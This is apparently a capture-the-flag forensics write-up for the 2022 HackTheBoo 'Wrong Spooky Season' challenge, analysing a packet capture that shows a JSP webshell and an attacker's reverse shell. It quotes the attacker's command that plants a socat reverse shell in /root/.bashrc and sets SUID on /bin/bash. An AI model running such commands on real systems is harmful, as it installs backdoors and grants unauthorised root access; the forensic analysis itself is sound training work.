Forensics - Wrong Spooky Season

2022 HTB HackTheBoo CTF - Forensics - Wrong Spooky Season Writeup

For this challenge we got a single PCAP. As usual with a PCAP, we opened it in Wireshark so we can see whats inside.

It wasn't a very large PCAP and just skimming through we could see some unusual traffic. Take a look at the picture below and see if you can spot whats wrong here:

If you didnt spot it, its the cmd=*. Seeing an argument for cmd= anything, let alone 'whoami' and 'id', is a red flag. This was some sort of jsp webshell that an attacker was abusing. Following this along we see the attacker get a reverse shell and right-clicking and following the traffic shows us what is being communicated to and from the attacker over this connection.

As you can see in blue the attacker is doing some very suspicious commands that would definitely catch the attention of anyone monitoring this system. There's a particularly long command at the end though where the attacker runs:

socat TCP: EXEC:sh' > /root/.bashrc && echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" | rev > /dev/null && chmod +s /bin/bash
ls -lha

This contains a base64 encoded, and then reversed, payload of some sort. Pasting it into Cyberchef and decoding it shows us the flag.


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